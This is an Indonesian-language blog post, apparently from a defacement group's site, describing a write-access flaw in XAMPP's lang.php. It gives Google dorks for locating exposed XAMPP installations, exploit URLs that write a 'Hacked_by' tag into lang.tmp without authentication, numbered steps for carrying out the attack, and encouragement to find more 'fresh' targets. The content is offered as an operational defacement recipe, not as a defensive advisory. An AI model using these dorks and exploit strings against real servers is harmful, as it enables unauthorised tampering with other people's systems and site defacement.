You are here
Home > Deface

XAMPP Local Write Access Vulnerability

XAMPP Local Write Access

XAMPP adalah sebuah perangkat lunak open source yang mendukung banyak sistem operasi untuk menjalankan sebuah server dalam localhost. Dengan XAMPP, kita bisa menjalankan banyak program sekaligus dengan sekali klik seperti apache, mysql database, php dan perl.

Memang luar biasa program ini, tetapi dibalik semua itu XAMPP memiliki sebuah kelemehan yaitu pada file lang.php. Kelemahan ini terjadi karena kita bisa mengirimkan sebuah perintah tidak valid untuk mengganti bahasa tanpa autentikasi. Tanpa terhubung kedalam jaringan lokal, kita bisa merubah file lang.tmp yang seharusnya menampilkan bahasa valid.

Itulah yang dinamakan xampp local write access. Teknik ini tergolong sangat mudah, karena kerjaannya tinggal exploit – exploit aja.

Dork:
inurl:/xampp/lang.php
inurl:/security/lang.php

Kembangin lagi gan, masih banyak yang fresh. Caranya? Buka artikel cara mengembangkan dork google.

Exploit:
/xampp/lang.php?Hacked_by_0N3R1D3R
/security/lang.php?Hacked_by_0N3R1D3R

1.Dorking menggunakan dork diatas
XAMPP Local Write Access

2.Buka websitenya lalu masukan exploitnya, jika berhasil biasanya akan muncul tulisan yang kurang lebih seperti dibawah
XAMPP Local Write Access

3.Untuk melihat hasilnya, buka file lang.tmp. File ini terletak di /xampp/lang.tmp atau /security/lang.tmp
XAMPP Local Write Access

0N3R1D3R
Founder Indonesia To World Team
https://www.indonesiatoworld.org

Berlangganan via email

Ketik email:


Tinggalkan Balasan

Top